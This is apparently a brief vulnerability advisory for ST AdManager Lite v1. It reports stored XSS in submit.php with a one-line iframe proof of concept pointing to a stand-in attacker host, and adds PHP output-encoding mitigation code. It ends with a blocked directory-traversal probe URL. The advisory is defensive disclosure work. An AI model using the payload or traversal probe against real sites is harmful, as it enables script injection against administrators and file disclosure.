ST AdManager Lite v1
submit.php input form
The submit.php input forms do not correctly sanitize user input before it is submitted to be checked by an admin and then published. This in turn allows a user to execute an XSS attack.
Log in as an admin and check the article.
PoC: [iframe src=http://evilsite.com/scriptlet.html [
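The mitigation on the admin review side, shown as an added example that is not ST AdManager Lite code: the field names (title, body) and function names are hypothetical, and the sample submission is constructed from the PoC above. It contrasts echoing the stored submission as markup with encoding it at output time.

```php
<?php
// Added example; names are hypothetical, not taken from ST AdManager Lite.

/** Encode a stored value for an HTML text or quoted-attribute context. */
function e(string $value): string
{
    // ENT_QUOTES encodes both quote styles; ENT_SUBSTITUTE replaces invalid
    // byte sequences instead of returning an empty string.
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

/** Unsafe: stored fields are emitted as markup, so the admin's browser parses them. */
function render_pending_unsafe(array $ad): string
{
    return '<h2>' . $ad['title'] . '</h2><div>' . $ad['body'] . '</div>';
}

/** Hardened: every stored field is encoded where it is written into the page. */
function render_pending_safe(array $ad): string
{
    return '<h2>' . e($ad['title']) . '</h2><div>' . e($ad['body']) . '</div>';
}

// Constructed sample of a pending submission awaiting admin review.
$ad = [
    'title' => 'Spring sale',
    'body'  => '<iframe src=http://evilsite.com/scriptlet.html>',
];

if (PHP_SAPI !== 'cli') {
    // Defence in depth for the review page: no framing of other origins.
    header("Content-Security-Policy: default-src 'self'; frame-src 'none'");
}

// The unsafe renderer passes the tag through untouched; the safe one does not.
$unsafe = render_pending_unsafe($ad);
$safe   = render_pending_safe($ad);

echo 'unsafe output contains a live tag: ',
     (strpos($unsafe, '<iframe') !== false ? 'yes' : 'no'), PHP_EOL;
echo 'safe output contains a live tag:   ',
     (strpos($safe, '<iframe') !== false ? 'yes' : 'no'), PHP_EOL;
echo $safe, PHP_EOL;
```

Encoding belongs at output, in both the admin review view and the published page, because the stored value is rendered in both places.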
Possible Directory traversal?:
The URL below, when tested, produced a script action blocked msg from PHPSecurex, due to it being installed on the test server. I'll assume /../../../../ must be SecFiltered in mod_security.
ERROR MSG: The requested URL /index.php?id=/../../../../ contains a script or action that has has been deteremined unsafe. It has been disabled to prevent abuse.
This server protected by: SecurePHPx
Apache/1.3.34 Server at www.example.com Port 80